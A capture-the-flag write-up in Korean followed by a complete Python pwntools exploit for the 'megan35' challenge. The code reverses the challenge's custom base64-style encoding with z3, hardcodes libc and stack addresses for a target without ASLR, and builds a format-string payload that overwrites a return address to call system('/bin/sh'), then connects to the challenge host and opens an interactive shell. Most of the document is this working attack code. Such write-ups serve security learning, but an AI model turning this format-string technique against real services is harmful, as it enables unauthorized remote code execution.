내 입력이 암호화 되어서 printf(&encrypt);이런식으로 format string bug가 유발된다. 암호화는 어렵지 않고 오버플로우는 일어나지 않는다 복호화는 그냥 암호화 식을 이용해서 z3로 풀어버렸다 오버플로우가 안나는데 fsb만 가지고 어떻게 트리거할지 고민(삽질)하던 중 리모트로 테스트해보다가 리모트 환경이 aslr이 꺼져있는 환경이라는 걸 알아냈다;; 디버깅으로 오프셋 구해서 stack libc베이스를 구하고 system('/bin/sh')를 트리거했다.
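from pwn import *
import random
from z3 import *

# Alphabet of the challenge's 4-char -> 3-byte encoding (a permuted base64 table).
table = '3GHIJKLMNOPQRSTUb=cdefghijklmnopWXYZ/12+406789VaqrstuvwxyzABCDEF'
# Reverse lookup: character -> 6-bit index in ``table``.
table_ind = {}
for pos in range(len(table)):
    table_ind[table[pos]] = pos


def encrypt(input):
    """Encode four alphabet characters into three bytes, as the target binary does.

    Each character is mapped to its 6-bit index in ``table``; the 24 bits are then
    re-packed into three bytes (each truncated with ``& 0xff``).

    Raises KeyError for a character outside ``table`` and IndexError if fewer than
    four characters are given.
    """
    a, b, c, d = (table_ind[input[k]] for k in range(4))
    packed = [
        a * 4 + ((b & 0x30) >> 4),   # bits 2-7: a, bits 0-1: high two bits of b
        b * 16 + ((c & 0x3C) >> 2),  # bits 4-7: low nibble of b, bits 0-3: c[2:6]
        d + (c << 6),                # bits 6-7: low two bits of c, bits 0-5: d
    ]
    return ''.join(chr(v & 0xff) for v in packed)


def decrypt(d):
    """Invert ``encrypt`` for one 3-byte chunk with z3; return the 4-char preimage.

    The three constraints mirror ``encrypt``. The packing is a bit permutation of
    24 bits, so with the indices restricted to 0..63 the preimage is unique. The
    range bound uses unsigned comparison (``ULT``): a signed ``< 64`` also admits
    negative bit-vectors, whose model value would not index ``table``.

    Raises ValueError if the chunk has no preimage (e.g. fewer than 3 bytes, or
    bytes that cannot arise from ``encrypt``).
    """
    if len(d) < 3:
        raise ValueError('decrypt needs a 3-byte chunk, got %r' % (d,))
    w = BitVec('w', 32)
    x = BitVec('x', 32)
    y = BitVec('y', 32)
    z = BitVec('z', 32)
    s = Solver()
    s.add(ULT(w, 64), ULT(x, 64), ULT(y, 64), ULT(z, 64))
    s.add(((w * 4 + ((x & 0x30) >> 4)) & 0xff) == ord(d[0]))
    s.add(((x * 16 + ((y & 0x3c) >> 2)) & 0xff) == ord(d[1]))
    s.add((((y << 6) + z) & 0xff) == ord(d[2]))
    if s.check() != sat:
        raise ValueError('no 4-char preimage for chunk %r' % (d,))
    m = s.model()
    return ''.join(table[m[v].as_long()] for v in (w, x, y, z))


# Addresses recovered by debugging against the remote target, which the writeup
# found to run without ASLR; they are specific to that environment.
libc_startmain = 0xf7e31637 - 247
libc_base = libc_startmain - 0x18540
system = libc_base + 0x3a940
binsh = libc_base + 0x15900b
stack_ret = 0xffffdc6c + 0x150 + 0x10

r = remote('megan35.stillhackinganyway.nl', 3535)
raw_input()  # pause before sending, as in the original run

# pwntools format-string write of (system, binsh) at stack_ret / stack_ret+8 through
# argument offset 71; the trailing "%4096c" is kept from the original payload.
payload = fmtstr.fmtstr_payload(71, {stack_ret: system, stack_ret + 8: binsh}) + '%4096c'
print(payload)

# The target decodes input in 3-byte groups, so pad with spaces to a multiple of 3.
if len(payload) % 3 != 0:
    payload = payload.ljust(len(payload) + 3 - len(payload) % 3, ' ')
pay = ''.join(decrypt(payload[i:i + 3]) for i in range(0, len(payload), 3))
print(pay)

r.sendline(pay)
r.interactive()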